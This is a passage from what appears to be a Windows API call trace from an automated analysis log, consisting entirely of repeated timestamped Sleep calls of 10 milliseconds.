(dwMilliseconds=0xa) [0107.421] Sleep (dwMilliseconds=0xa) [0107.431] Sleep (dwMilliseconds=0xa) [0107.442] Sleep (dwMilliseconds=0xa) [0107.453] Sleep (dwMilliseconds=0xa) [0107.476] Sleep (dwMilliseconds=0xa) [0107.487] Sleep (dwMilliseconds=0xa) [0107.497] Sleep (dwMilliseconds=0xa) [0107.544] Sleep (dwMilliseconds=0xa) [0107.644] Sleep (dwMilliseconds=0xa) [0107.655] Sleep (dwMilliseconds=0xa) [0107.719] Sleep (dwMilliseconds=0xa) [0107.729] Sleep (dwMilliseconds=0xa) [0107.740] Sleep (dwMilliseconds=0xa) [0107.856] Sleep (dwMilliseconds=0xa) [0107.916] Sleep (dwMilliseconds=0xa) [0107.933] Sleep (dwMilliseconds=0xa) [0107.943] Sleep (dwMilliseconds=0xa) [0107.954] Sleep (dwMilliseconds=0xa) [0107.965] Sleep (dwMilliseconds=0xa) [0107.976] Sleep (dwMilliseconds=0xa) [0107.987] Sleep (dwMilliseconds=0xa) [0107.997] Sleep (dwMilliseconds=0xa) [0108.094] Sleep (dwMilliseconds=0xa) [0108.140] Sleep (dwMilliseconds=0xa) [0108.157] Sleep (dwMilliseconds=0xa) [0108.167] Sleep (dwMilliseconds=0xa) [0108.206] Sleep (dwMilliseconds=0xa) [0108.221] Sleep (dwMilliseconds=0xa) [0108.232] Sleep (dwMilliseconds=0xa) [0108.249] Sleep (dwMilliseconds=0xa) [0108.259] Sleep (dwMilliseconds=0xa) [0108.276] Sleep (dwMilliseconds=0xa) [0108.287] Sleep (dwMilliseconds=0xa) [0108.297] Sleep (dwMilliseconds=0xa) [0108.395] Sleep (dwMilliseconds=0xa) [0108.412] Sleep (dwMilliseconds=0xa) [0108.505] Sleep (dwMilliseconds=0xa) [0108.516] Sleep (dwMilliseconds=0xa) [0108.527] Sleep (dwMilliseconds=0xa) [0108.563] Sleep (dwMilliseconds=0xa) [0108.575] Sleep (dwMilliseconds=0xa) [0108.586] Sleep (dwMilliseconds=0xa) [0108.597] Sleep (dwMilliseconds=0xa) [0108.608] Sleep (dwMilliseconds=0xa) [0108.732] Sleep (dwMilliseconds=0xa) [0108.791] Sleep (dwMilliseconds=0xa) [0108.802] Sleep (dwMilliseconds=0xa) [0108.812] Sleep (dwMilliseconds=0xa) [0108.823] Sleep (dwMilliseconds=0xa) [0108.857] Sleep (dwMilliseconds=0xa) [0108.867] Sleep (dwMilliseconds=0xa) [0108.878] Sleep (dwMilliseconds=0xa) [0108.953] Sleep (dwMilliseconds=0xa) [0108.964] Sleep (dwMilliseconds=0xa) [0108.975] Sleep (dwMilliseconds=0xa) [0108.985] Sleep (dwMilliseconds=0xa) [0108.996] Sleep (dwMilliseconds=0xa) [0109.009] Sleep (dwMilliseconds=0xa) [0109.105] Sleep (dwMilliseconds=0xa) [0109.146] Sleep (dwMilliseconds=0xa) [0109.187] Sleep (dwMilliseconds=0xa) [0109.230] Sleep (dwMilliseconds=0xa) [0109.241] Sleep (dwMilliseconds=0xa) [0109.251] Sleep (dwMilliseconds=0xa) [0109.262] Sleep (dwMilliseconds=0xa) [0109.275] Sleep (dwMilliseconds=0xa) [0109.285] Sleep (dwMilliseconds=0xa) [0109.296] Sleep (dwMilliseconds=0xa) [0109.333] Sleep (dwMilliseconds=0xa) [0109.412] Sleep (dwMilliseconds=0xa) [0109.479] Sleep (dwMilliseconds=0xa) [0109.499] Sleep (dwMilliseconds=0xa) [0109.528] Sleep (dwMilliseconds=0xa) [0109.551] Sleep (dwMilliseconds=0xa) [0109.561] Sleep (dwMilliseconds=0xa) [0109.571] Sleep (dwMilliseconds=0xa) [0109.582] Sleep (dwMilliseconds=0xa) [0109.592] Sleep (dwMilliseconds=0xa) [0109.679] Sleep (dwMilliseconds=0xa) [0109.690] Sleep (dwMilliseconds=0xa) [0109.700] Sleep (dwMilliseconds=0xa) [0109.711] Sleep (dwMilliseconds=0xa) [0109.721] Sleep (dwMilliseconds=0xa) [0109.824] Sleep (dwMilliseconds=0xa) [0109.834] Sleep (dwMilliseconds=0xa) [0109.848] Sleep (dwMilliseconds=0xa) [0109.926] Sleep (dwMilliseconds=0xa) [0109.937] Sleep (dwMilliseconds=0xa) [0109.947] Sleep (dwMilliseconds=0xa) [0109.958] Sleep (dwMilliseconds=0xa) [0109.968] Sleep (dwMilliseconds=0xa) [0109.979] Sleep (dwMilliseconds=0xa) [0110.030] Sleep (dwMilliseconds=0xa) [0110.060] Sleep (dwMilliseconds=0xa) [0110.290] Sleep (dwMilliseconds=0xa) [0110.479] Sleep (dwMilliseconds=0xa) [0110.562] Sleep (dwMilliseconds=0xa) [0110.673] Sleep (dwMilliseconds=0xa) [0110.711] Sleep (dwMilliseconds=0xa) [0110.721] Sleep (dwMilliseconds=0xa) [0110.732] Sleep (dwMilliseconds=0xa) [0110.743] Sleep (dwMilliseconds=0xa) [0110.753] Sleep (dwMilliseconds=0xa) [0110.764] Sleep (dwMilliseconds=0xa) [0110.802] Sleep (dwMilliseconds=0xa) [0110.928] Sleep (dwMilliseconds=0xa) [0110.984] Sleep (dwMilliseconds=0xa) [0111.014] Sleep (dwMilliseconds=0xa) [0111.025] Sleep (dwMilliseconds=0xa) [0111.036] Sleep (dwMilliseconds=0xa) [0111.046] Sleep (dwMilliseconds=0xa) [0111.057] Sleep (dwMilliseconds=0xa) [0111.067] Sleep (dwMilliseconds=0xa) [0111.078] Sleep (dwMilliseconds=0xa) [0111.088] Sleep (dwMilliseconds=0xa) [0111.301] Sleep (dwMilliseconds=0xa) [0111.315] Sleep (dwMilliseconds=0xa) [0111.326] Sleep (dwMilliseconds=0xa) [0111.524] Sleep (dwMilliseconds=0xa) [0111.600] Sleep (dwMilliseconds=0xa) [0111.611] Sleep (dwMilliseconds=0xa) [0111.621] Sleep (dwMilliseconds=0xa) [0111.632] Sleep (dwMilliseconds=0xa) [0111.645] Sleep (dwMilliseconds=0xa) [0111.656] Sleep (dwMilliseconds=0xa) [0111.667] Sleep (dwMilliseconds=0xa) [0111.677] Sleep (dwMilliseconds=0xa) [0111.688] Sleep (dwMilliseconds=0xa) [0111.729] Sleep (dwMilliseconds=0xa) [0111.740] Sleep (dwMilliseconds=0xa) [0111.750] Sleep (dwMilliseconds=0xa) [0111.811] Sleep (dwMilliseconds=0xa) [0111.824] Sleep (dwMilliseconds=0xa) [0111.835] Sleep (dwMilliseconds=0xa) [0111.845] Sleep (dwMilliseconds=0xa) [0111.951] Sleep (dwMilliseconds=0xa) [0112.007] Sleep (dwMilliseconds=0xa) [0112.030] Sleep (dwMilliseconds=0xa) [0112.065] Sleep (dwMilliseconds=0xa) [0112.075] Sleep (dwMilliseconds=0xa) [0112.085] Sleep (dwMilliseconds=0xa) [0112.096] Sleep (dwMilliseconds=0xa) [0112.106] Sleep (dwMilliseconds=0xa) [0112.197] Sleep (dwMilliseconds=0xa) [0112.282] Sleep (dwMilliseconds=0xa) [0112.295] Sleep (dwMilliseconds=0xa) [0112.305] Sleep (dwMilliseconds=0xa) [0112.319] Sleep (dwMilliseconds=0xa) [0112.333] Sleep (dwMilliseconds=0xa) [0112.354] Sleep (dwMilliseconds=0xa) [0112.364] Sleep (dwMilliseconds=0xa) [0112.497] Sleep (dwMilliseconds=0xa) [0112.578] Sleep (dwMilliseconds=0xa) [0112.592] Sleep (dwMilliseconds=0xa) [0112.602] Sleep (dwMilliseconds=0xa) [0112.615] Sleep (dwMilliseconds=0xa) [0112.702] Sleep (dwMilliseconds=0xa) [0112.724] Sleep (dwMilliseconds=0xa) [0112.803] Sleep (dwMilliseconds=0xa) [0112.871] Sleep (dwMilliseconds=0xa) [0112.881] Sleep (dwMilliseconds=0xa) [0112.891] Sleep (dwMilliseconds=0xa) [0112.902] Sleep (dwMilliseconds=0xa) [0112.917] Sleep (dwMilliseconds=0xa) [0112.927] Sleep (dwMilliseconds=0xa) [0112.939] Sleep (dwMilliseconds=0xa) [0112.950] Sleep (dwMilliseconds=0xa) [0112.961] Sleep (dwMilliseconds=0xa) [0113.013] Sleep (dwMilliseconds=0xa) [0113.124] Sleep (dwMilliseconds=0xa) [0113.177] Sleep (dwMilliseconds=0xa) [0113.203] Sleep (dwMilliseconds=0xa) [0113.213] Sleep (dwMilliseconds=0xa) [0113.224] Sleep (dwMilliseconds=0xa) [0113.235] Sleep (dwMilliseconds=0xa) [0113.245] Sleep (dwMilliseconds=0xa) [0113.256] Sleep (dwMilliseconds=0xa) [0113.348] Sleep (dwMilliseconds=0xa) [0113.424] Sleep (dwMilliseconds=0xa) [0113.453] Sleep (dwMilliseconds=0xa) [0113.483] Sleep (dwMilliseconds=0xa) [0113.514] Sleep (dwMilliseconds=0xa) [0113.525] Sleep (dwMilliseconds=0xa) [0113.541] Sleep (dwMilliseconds=0xa) [0113.552] Sleep (dwMilliseconds=0xa) [0113.570] Sleep (dwMilliseconds=0xa) [0113.582] Sleep (dwMilliseconds=0xa) [0113.658] Sleep (dwMilliseconds=0xa) [0113.668] Sleep (dwMilliseconds=0xa) [0113.679] Sleep (dwMilliseconds=0xa) [0113.689] Sleep (dwMilliseconds=0xa) [0113.700] Sleep (dwMilliseconds=0xa) [0113.783] Sleep (dwMilliseconds=0xa) [0113.863] Sleep (dwMilliseconds=0xa) [0113.884] Sleep (dwMilliseconds=0xa) [0113.962] Sleep (dwMilliseconds=0xa) [0113.988] Sleep (dwMilliseconds=0xa) [0113.998] Sleep (dwMilliseconds=0xa) [0114.009] Sleep (dwMilliseconds=0xa) [0114.052] Sleep (dwMilliseconds=0xa) [0114.062] Sleep (dwMilliseconds=0xa) [0114.073] Sleep (dwMilliseconds=0xa) [0114.088] Sleep (dwMilliseconds=0xa) [0114.098] Sleep (dwMilliseconds=0xa) [0114.109] Sleep (dwMilliseconds=0xa) [0114.119] Sleep (dwMilliseconds=0xa) [0114.220] Sleep (dwMilliseconds=0xa) [0114.277] Sleep (dwMilliseconds=0xa) [0114.306] Sleep (dwMilliseconds=0xa) [0114.339] Sleep (dwMilliseconds=0xa) [0114.349] Sleep (dwMilliseconds=0xa) [0114.360] Sleep (dwMilliseconds=0xa) [0114.385] Sleep (dwMilliseconds=0xa) [0114.395] Sleep (dwMilliseconds=0xa) [0114.406] Sleep (dwMilliseconds=0xa) [0114.417] Sleep (dwMilliseconds=0xa) [0114.435] Sleep (dwMilliseconds=0xa) [0114.515] Sleep (dwMilliseconds=0xa) [0114.526] Sleep (dwMilliseconds=0xa) [0114.536] Sleep (dwMilliseconds=0xa) [0114.622] Sleep (dwMilliseconds=0xa) [0114.714] Sleep (dwMilliseconds=0xa) [0114.737] Sleep (dwMilliseconds=0xa) [0114.747] Sleep (dwMilliseconds=0xa) [0114.758] Sleep (dwMilliseconds=0xa) [0114.829] Sleep (dwMilliseconds=0xa) [0114.852] Sleep (dwMilliseconds=0xa) [0114.862] Sleep (dwMilliseconds=0xa) [0114.873] Sleep (dwMilliseconds=0xa) [0114.915] Sleep (dwMilliseconds=0xa) [0114.925] Sleep (dwMilliseconds=0xa) [0114.937] Sleep (dwMilliseconds=0xa) [0114.948] Sleep (dwMilliseconds=0xa) [0114.958] Sleep (dwMilliseconds=0xa) [0114.969] Sleep (dwMilliseconds=0xa) [0114.980] Sleep (dwMilliseconds=0xa) [0114.990] Sleep (dwMilliseconds=0xa) [0115.001] Sleep (dwMilliseconds=0xa) [0115.011] Sleep (dwMilliseconds=0xa) [0115.066] Sleep (dwMilliseconds=0xa) [0115.077] Sleep (dwMilliseconds=0xa) [0115.087] Sleep (dwMilliseconds=0xa) [0115.111] Sleep (dwMilliseconds=0xa) [0115.122] Sleep (dwMilliseconds=0xa) [0115.132] Sleep (dwMilliseconds=0xa) [0115.240] Sleep (dwMilliseconds=0xa) [0115.321] Sleep (dwMilliseconds=0xa) [0115.359] Sleep (dwMilliseconds=0xa) [0115.370] Sleep (dwMilliseconds=0xa) [0115.389] Sleep (dwMilliseconds=0xa) [0115.400] Sleep (dwMilliseconds=0xa) [0115.410] Sleep (dwMilliseconds=0xa) [0115.421] Sleep (dwMilliseconds=0xa) [0115.431] Sleep (dwMilliseconds=0xa) [0115.449] Sleep (dwMilliseconds=0xa) [0115.459] Sleep (dwMilliseconds=0xa) [0115.470] Sleep (dwMilliseconds=0xa) [0115.553] Sleep (dwMilliseconds=0xa) [0115.563] Sleep (dwMilliseconds=0xa) [0115.574] Sleep (dwMilliseconds=0xa) [0115.585] Sleep (dwMilliseconds=0xa) [0115.595] Sleep (dwMilliseconds=0xa) [0115.680] Sleep (dwMilliseconds=0xa) [0115.692] Sleep (dwMilliseconds=0xa) [0115.703] Sleep (dwMilliseconds=0xa) [0115.760] Sleep (dwMilliseconds=0xa) [0115.848] Sleep (dwMilliseconds=0xa) [0115.872] Sleep (dwMilliseconds=0xa) [0115.882] Sleep (dwMilliseconds=0xa) [0115.893] Sleep (dwMilliseconds=0xa) [0115.903] Sleep (dwMilliseconds=0xa) [0115.914] Sleep (dwMilliseconds=0xa) [0116.052] Sleep (dwMilliseconds=0xa) [0116.068] Sleep (dwMilliseconds=0xa) [0116.089] Sleep (dwMilliseconds=0xa) [0116.191] Sleep (dwMilliseconds=0xa) [0116.226] Sleep (dwMilliseconds=0xa) [0116.249] Sleep (dwMilliseconds=0xa) [0116.259] Sleep (dwMilliseconds=0xa) [0116.277] Sleep (dwMilliseconds=0xa) [0116.288] Sleep (dwMilliseconds=0xa) [0116.324] Sleep (dwMilliseconds=0xa) [0116.334] Sleep (dwMilliseconds=0xa) [0116.345] Sleep (dwMilliseconds=0xa) [0116.356] Sleep (dwMilliseconds=0xa) [0116.367] Sleep (dwMilliseconds=0xa) [0116.401] Sleep (dwMilliseconds=0xa) [0116.412] Sleep (dwMilliseconds=0xa) [0116.423] Sleep (dwMilliseconds=0xa) [0116.488] Sleep (dwMilliseconds=0xa) [0116.499] Sleep (dwMilliseconds=0xa) [0116.555] Sleep (dwMilliseconds=0xa) [0116.637] Sleep (dwMilliseconds=0xa) [0116.666] Sleep (dwMilliseconds=0xa) [0116.677] Sleep (dwMilliseconds=0xa) [0116.688] Sleep (dwMilliseconds=0xa) [0116.698] Sleep (dwMilliseconds=0xa) [0116.709] Sleep (dwMilliseconds=0xa) [0116.720] Sleep (dwMilliseconds=0xa) [0116.731] Sleep (dwMilliseconds=0xa) [0116.741] Sleep (dwMilliseconds=0xa) [0116.752] Sleep (dwMilliseconds=0xa) [0116.762] Sleep (dwMilliseconds=0xa) [0116.976] Sleep (dwMilliseconds=0xa) [0116.986] Sleep (dwMilliseconds=0xa) [0116.997] Sleep (dwMilliseconds=0xa) [0117.007] Sleep (dwMilliseconds=0xa) [0117.018] Sleep (dwMilliseconds=0xa) [0117.028] Sleep (dwMilliseconds=0xa) [0117.039] Sleep (dwMilliseconds=0xa) [0117.188] Sleep (dwMilliseconds=0xa) [0117.268] Sleep (dwMilliseconds=0xa) [0117.297] Sleep (dwMilliseconds=0xa) [0117.307] Sleep (dwMilliseconds=0xa) [0117.318] Sleep (dwMilliseconds=0xa) [0117.328] Sleep (dwMilliseconds=0xa) [0117.350] Sleep (dwMilliseconds=0xa) [0117.360] Sleep (dwMilliseconds=0xa) [0117.411] Sleep (dwMilliseconds=0xa) [0117.422] Sleep (dwMilliseconds=0xa) [0117.432] Sleep (dwMilliseconds=0xa) [0117.482] Sleep (dwMilliseconds=0xa) [0117.492] Sleep (dwMilliseconds=0xa) [0117.503] Sleep (dwMilliseconds=0xa) [0117.514] Sleep (dwMilliseconds=0xa) [0117.524] Sleep (dwMilliseconds=0xa) [0117.614] Sleep (dwMilliseconds=0xa) [0117.657] Sleep (dwMilliseconds=0xa) [0117.739] Sleep (dwMilliseconds=0xa) [0117.779] Sleep (dwMilliseconds=0xa) [0117.789] Sleep (dwMilliseconds=0xa) [0117.800] Sleep (dwMilliseconds=0xa) [0117.810] Sleep (dwMilliseconds=0xa) [0117.822] Sleep (dwMilliseconds=0xa) [0117.832] Sleep (dwMilliseconds=0xa) [0117.842] Sleep (dwMilliseconds=0xa) [0117.969] Sleep (dwMilliseconds=0xa) [0118.034] Sleep (dwMilliseconds=0xa) [0118.061] Sleep (dwMilliseconds=0xa) [0118.079] Sleep (dwMilliseconds=0xa) [0118.090] Sleep (dwMilliseconds=0xa) [0118.101] Sleep (dwMilliseconds=0xa) [0118.115] Sleep (dwMilliseconds=0xa) [0118.195] Sleep (dwMilliseconds=0xa) [0118.282] Sleep (dwMilliseconds=0xa) [0118.426] Sleep (dwMilliseconds=0xa) [0118.437] Sleep (dwMilliseconds=0xa) [0118.448] Sleep (dwMilliseconds=0xa) [0118.519] Sleep (dwMilliseconds=0xa) [0118.593] Sleep (dwMilliseconds=0xa) [0118.603] Sleep (dwMilliseconds=0xa) [0118.614] Sleep (dwMilliseconds=0xa) [0118.625] Sleep (dwMilliseconds=0xa) [0118.635] Sleep (dwMilliseconds=0xa) [0118.646] Sleep (dwMilliseconds=0xa) [0118.657] Sleep (dwMilliseconds=0xa) [0118.668] Sleep (dwMilliseconds=0xa) [0118.678] Sleep (dwMilliseconds=0xa) [0118.771] Sleep (dwMilliseconds=0xa) [0118.803] Sleep (dwMilliseconds=0xa) [0118.814] Sleep (dwMilliseconds=0xa) [0118.824] Sleep (dwMilliseconds=0xa) [0118.880] Sleep (dwMilliseconds=0xa) [0118.891] Sleep (dwMilliseconds=0xa) [0118.909] Sleep (dwMilliseconds=0xa) [0118.919] Sleep (dwMilliseconds=0xa) [0118.930] Sleep (dwMilliseconds=0xa) [0118.942] Sleep (dwMilliseconds=0xa) [0119.026] Sleep (dwMilliseconds=0xa) [0119.081] Sleep (dwMilliseconds=0xa) [0119.179] Sleep (dwMilliseconds=0xa) [0119.209] Sleep (dwMilliseconds=0xa) [0119.220] Sleep (dwMilliseconds=0xa) [0119.231] Sleep (dwMilliseconds=0xa) [0119.244] Sleep (dwMilliseconds=0xa) [0119.292] Sleep (dwMilliseconds=0xa) [0119.302] Sleep (dwMilliseconds=0xa) [0119.418] Sleep (dwMilliseconds=0xa) [0119.479] Sleep (dwMilliseconds=0xa) [0119.489] Sleep (dwMilliseconds=0xa) [0119.500] Sleep (dwMilliseconds=0xa) [0119.512] Sleep (dwMilliseconds=0xa) [0119.523] Sleep (dwMilliseconds=0xa) [0119.533] Sleep (dwMilliseconds=0xa) [0119.544] Sleep (dwMilliseconds=0xa) [0119.554] Sleep (dwMilliseconds=0xa) [0119.565] Sleep (dwMilliseconds=0xa) [0119.575] Sleep (dwMilliseconds=0xa) [0119.586] Sleep (dwMilliseconds=0xa) [0119.667] Sleep (dwMilliseconds=0xa) [0119.678] Sleep (dwMilliseconds=0xa) [0119.689] Sleep (dwMilliseconds=0xa) [0119.699] Sleep (dwMilliseconds=0xa) [0119.710] Sleep (dwMilliseconds=0xa) [0119.720] Sleep (dwMilliseconds=0xa) [0119.731] Sleep (dwMilliseconds=0xa) [0119.741] Sleep (dwMilliseconds=0xa) [0119.752] Sleep (dwMilliseconds=0xa) [0119.763] Sleep (dwMilliseconds=0xa) [0119.784] Sleep (dwMilliseconds=0xa) [0119.794] Sleep (dwMilliseconds=0xa) [0119.805] Sleep (dwMilliseconds=0xa) [0119.815] Sleep (dwMilliseconds=0xa) [0119.851] Sleep (dwMilliseconds=0xa) [0119.861] Sleep (dwMilliseconds=0xa) [0119.872] Sleep (dwMilliseconds=0xa) [0119.882] Sleep (dwMilliseconds=0xa) [0119.893] Sleep (dwMilliseconds=0xa) [0119.903] Sleep (dwMilliseconds=0xa) [0119.914] Sleep (dwMilliseconds=0xa) [0119.924] Sleep (dwMilliseconds=0xa) [0119.935] Sleep (dwMilliseconds=0xa) [0119.945] Sleep (dwMilliseconds=0xa) [0119.990] Sleep (dwMilliseconds=0xa) [0120.000] Sleep (dwMilliseconds=0xa) [0120.018] Sleep (dwMilliseconds=0xa) [0120.061] Sleep (dwMilliseconds=0xa) [0120.172] Sleep (dwMilliseconds=0xa) [0120.236] Sleep (dwMilliseconds=0xa) [0120.263] Sleep (dwMilliseconds=0xa) [0120.420] Sleep (dwMilliseconds=0xa) [0120.483] Sleep (dwMilliseconds=0xa) [0120.494] Sleep (dwMilliseconds=0xa) [0120.508] Sleep (dwMilliseconds=0xa) [0120.519] Sleep (dwMilliseconds=0xa) [0120.608] Sleep (dwMilliseconds=0xa) [0120.619] Sleep (dwMilliseconds=0xa) [0120.630] Sleep (dwMilliseconds=0xa) [0120.640] Sleep (dwMilliseconds=0xa) [0120.651] Sleep (dwMilliseconds=0xa) [0120.661] Sleep (dwMilliseconds=0xa) [0120.673] Sleep (dwMilliseconds=0xa) [0120.717] Sleep (dwMilliseconds=0xa) [0120.728] Sleep (dwMilliseconds=0xa) [0120.739] Sleep (dwMilliseconds=0xa) [0120.749] Sleep (dwMilliseconds=0xa) [0120.805] Sleep (dwMilliseconds=0xa) [0120.816] Sleep (dwMilliseconds=0xa) [0120.826] Sleep (dwMilliseconds=0xa) [0120.838] Sleep (dwMilliseconds=0xa) [0120.849] Sleep (dwMilliseconds=0xa) [0120.859] Sleep (dwMilliseconds=0xa) [0120.869] Sleep (dwMilliseconds=0xa) [0120.880] Sleep (dwMilliseconds=0xa) [0120.890] Sleep (dwMilliseconds=0xa) [0120.931] Sleep (dwMilliseconds=0xa) [0120.942] Sleep (dwMilliseconds=0xa) [0120.952] Sleep (dwMilliseconds=0xa) [0120.989] Sleep (dwMilliseconds=0xa) [0120.999] Sleep (dwMilliseconds=0xa) [0121.013] Sleep (dwMilliseconds=0xa) [0121.024] Sleep (dwMilliseconds=0xa) [0121.034] Sleep (dwMilliseconds=0xa) [0121.045] Sleep (dwMilliseconds=0xa) [0121.056] Sleep (dwMilliseconds=0xa) [0121.067] Sleep (dwMilliseconds=0xa) [0121.077] Sleep (dwMilliseconds=0xa) [0121.144] Sleep (dwMilliseconds=0xa) [0121.155] Sleep (dwMilliseconds=0xa) [0121.165] Sleep (dwMilliseconds=0xa) [0121.179] Sleep (dwMilliseconds=0xa) [0121.190] Sleep (dwMilliseconds=0xa) [0121.200] Sleep (dwMilliseconds=0xa) [0121.214] Sleep (dwMilliseconds=0xa) [0121.225] Sleep (dwMilliseconds=0xa) [0121.236] Sleep (dwMilliseconds=0xa) [0121.246] Sleep (dwMilliseconds=0xa) [0121.257] Sleep (dwMilliseconds=0xa) [0121.268] Sleep (dwMilliseconds=0xa) [0121.278] Sleep (dwMilliseconds=0xa) [0121.356] Sleep (dwMilliseconds=0xa) [0121.366] Sleep (dwMilliseconds=0xa) [0121.388] Sleep (dwMilliseconds=0xa) [0121.398] Sleep (dwMilliseconds=0xa) [0121.409] Sleep (dwMilliseconds=0xa) [0121.419] Sleep (dwMilliseconds=0xa) [0121.430] Sleep (dwMilliseconds=0xa) [0121.440] Sleep (dwMilliseconds=0xa) [0121.451] Sleep (dwMilliseconds=0xa) [0121.461] Sleep (dwMilliseconds=0xa) [0121.472] Sleep (dwMilliseconds=0xa) [0121.482] Sleep (dwMilliseconds=0xa) [0121.493] Sleep (dwMilliseconds=0xa) [0121.582] Sleep (dwMilliseconds=0xa) [0121.593] Sleep (dwMilliseconds=0xa) [0121.604] Sleep (dwMilliseconds=0xa) [0121.615] Sleep (dwMilliseconds=0xa) [0121.629] Sleep (dwMilliseconds=0xa) [0121.646] Sleep (dwMilliseconds=0xa) [0121.657] Sleep (dwMilliseconds=0xa) [0121.668] Sleep (dwMilliseconds=0xa) [0121.678] Sleep (dwMilliseconds=0xa) [0121.689] Sleep (dwMilliseconds=0xa) [0121.700] Sleep (dwMilliseconds=0xa) [0121.710] Sleep (dwMilliseconds=0xa) [0121.721] Sleep (dwMilliseconds=0xa) [0121.782] Sleep (dwMilliseconds=0xa) [0121.793] Sleep (dwMilliseconds=0xa) [0121.807] Sleep (dwMilliseconds=0xa) [0121.818] Sleep (dwMilliseconds=0xa) [0121.829] Sleep (dwMilliseconds=0xa) [0121.839] Sleep (dwMilliseconds=0xa) [0121.850] Sleep (dwMilliseconds=0xa) [0121.864] Sleep (dwMilliseconds=0xa) [0121.906] Sleep (dwMilliseconds=0xa) [0121.935] Sleep (dwMilliseconds=0xa) [0121.946] Sleep (dwMilliseconds=0xa) [0121.956] Sleep (dwMilliseconds=0xa) [0121.967] Sleep (dwMilliseconds=0xa) [0121.997] Sleep (dwMilliseconds=0xa) [0122.007] Sleep (dwMilliseconds=0xa) [0122.018] Sleep (dwMilliseconds=0xa) [0122.029] Sleep (dwMilliseconds=0xa) [0122.039] Sleep (dwMilliseconds=0xa) [0122.050] Sleep (dwMilliseconds=0xa) [0122.060] Sleep (dwMilliseconds=0xa) [0122.071] Sleep (dwMilliseconds=0xa) [0122.081] Sleep (dwMilliseconds=0xa) [0122.096] Sleep (dwMilliseconds=0xa) [0122.160] Sleep (dwMilliseconds=0xa) [0122.171] Sleep (dwMilliseconds=0xa) [0122.181] Sleep (dwMilliseconds=0xa) [0122.197] Sleep (dwMilliseconds=0xa) [0122.208] Sleep (dwMilliseconds=0xa) [0122.220] Sleep (dwMilliseconds=0xa) [0122.231] Sleep (dwMilliseconds=0xa) [0122.241] Sleep (dwMilliseconds=0xa) [0122.252] Sleep (dwMilliseconds=0xa) [0122.263] Sleep (dwMilliseconds=0xa) [0122.276] Sleep (dwMilliseconds=0xa) [0122.287] Sleep (dwMilliseconds=0xa) [0122.297] Sleep (dwMilliseconds=0xa) [0122.395] Sleep (dwMilliseconds=0xa) [0122.405] Sleep (dwMilliseconds=0xa) [0122.421] Sleep (dwMilliseconds=0xa) [0122.431] Sleep (dwMilliseconds=0xa) [0122.442] Sleep (dwMilliseconds=0xa) [0122.453] Sleep (dwMilliseconds=0xa) [0122.463] Sleep (dwMilliseconds=0xa) [0122.474] Sleep (dwMilliseconds=0xa) [0122.484] Sleep (dwMilliseconds=0xa) [0122.495] Sleep (dwMilliseconds=0xa) [0122.506] Sleep (dwMilliseconds=0xa) [0122.614] Sleep (dwMilliseconds=0xa) [0122.625] Sleep (dwMilliseconds=0xa) [0122.635] Sleep (dwMilliseconds=0xa) [0122.646] Sleep (dwMilliseconds=0xa) [0122.656] Sleep (dwMilliseconds=0xa) [0122.667] Sleep (dwMilliseconds=0xa) [0122.677] Sleep (dwMilliseconds=0xa) [0122.688] Sleep (dwMilliseconds=0xa) [0122.699] Sleep (dwMilliseconds=0xa) [0122.709] Sleep (dwMilliseconds=0xa) [0122.807] Sleep (dwMilliseconds=0xa) [0122.818] Sleep (dwMilliseconds=0xa) [0122.829] Sleep (dwMilliseconds=0xa) [0122.840] Sleep (dwMilliseconds=0xa) [0122.850] Sleep (dwMilliseconds=0xa) [0122.861] Sleep (dwMilliseconds=0xa) [0122.872] Sleep (dwMilliseconds=0xa) [0122.882] Sleep (dwMilliseconds=0xa) [0122.893] Sleep (dwMilliseconds=0xa) [0122.903] Sleep (dwMilliseconds=0xa) [0122.926] Sleep (dwMilliseconds=0xa) [0122.939] Sleep (dwMilliseconds=0xa) [0122.950] Sleep (dwMilliseconds=0xa) [0122.990] Sleep (dwMilliseconds=0xa) [0123.002] Sleep (dwMilliseconds=0xa) [0123.013] Sleep (dwMilliseconds=0xa) [0123.023] Sleep (dwMilliseconds=0xa) [0123.034] Sleep (dwMilliseconds=0xa) [0123.045] Sleep (dwMilliseconds=0xa) [0123.055] Sleep (dwMilliseconds=0xa) [0123.135] Sleep (dwMilliseconds=0xa) [0123.177] Sleep (dwMilliseconds=0xa) [0123.188] Sleep (dwMilliseconds=0xa) [0123.198] Sleep (dwMilliseconds=0xa) [0123.228] Sleep (dwMilliseconds=0xa) [0123.238] Sleep (dwMilliseconds=0xa) [0123.249] Sleep (dwMilliseconds=0xa) [0123.260] Sleep (dwMilliseconds=0xa) [0123.277] Sleep (dwMilliseconds=0xa) [0123.287] Sleep (dwMilliseconds=0xa) [0123.298] Sleep (dwMilliseconds=0xa) [0123.308] Sleep (dwMilliseconds=0xa) [0123.319] Sleep (dwMilliseconds=0xa) [0123.424] Sleep (dwMilliseconds=0xa) [0123.434] Sleep (dwMilliseconds=0xa) [0123.445] Sleep (dwMilliseconds=0xa) [0123.455] Sleep (dwMilliseconds=0xa) [0123.466] Sleep (dwMilliseconds=0xa) [0123.476] Sleep (dwMilliseconds=0xa) [0123.487] Sleep (dwMilliseconds=0xa) [0123.498] Sleep (dwMilliseconds=0xa) [0123.508] Sleep (dwMilliseconds=0xa) [0123.519] Sleep (dwMilliseconds=0xa) [0123.529] Sleep (dwMilliseconds=0xa) [0123.625] Sleep (dwMilliseconds=0xa) [0123.636] Sleep (dwMilliseconds=0xa) [0123.646] Sleep (dwMilliseconds=0xa) [0123.662] Sleep (dwMilliseconds=0xa) [0123.673] Sleep (dwMilliseconds=0xa) [0123.684] Sleep (dwMilliseconds=0xa) [0123.694] Sleep (dwMilliseconds=0xa) [0123.704] Sleep (dwMilliseconds=0xa) [0123.715] Sleep (dwMilliseconds=0xa) [0123.726] Sleep (dwMilliseconds=0xa) [0123.750] Sleep (dwMilliseconds=0xa) [0123.761] Sleep (dwMilliseconds=0xa) [0123.772] Sleep (dwMilliseconds=0xa) [0123.782] Sleep (dwMilliseconds=0xa) [0123.829] Sleep (dwMilliseconds=0xa) [0123.840] Sleep (dwMilliseconds=0xa) [0123.858] Sleep (dwMilliseconds=0xa) [0123.868] Sleep (dwMilliseconds=0xa) [0123.879] Sleep (dwMilliseconds=0xa) [0123.889] Sleep (dwMilliseconds=0xa) [0123.900] Sleep (dwMilliseconds=0xa) [0123.911] Sleep (dwMilliseconds=0xa) [0123.921] Sleep (dwMilliseconds=0xa) [0123.956] Sleep (dwMilliseconds=0xa) [0123.966] Sleep (dwMilliseconds=0xa) [0123.977] Sleep (dwMilliseconds=0xa) [0124.016] Sleep (dwMilliseconds=0xa) [0124.027] 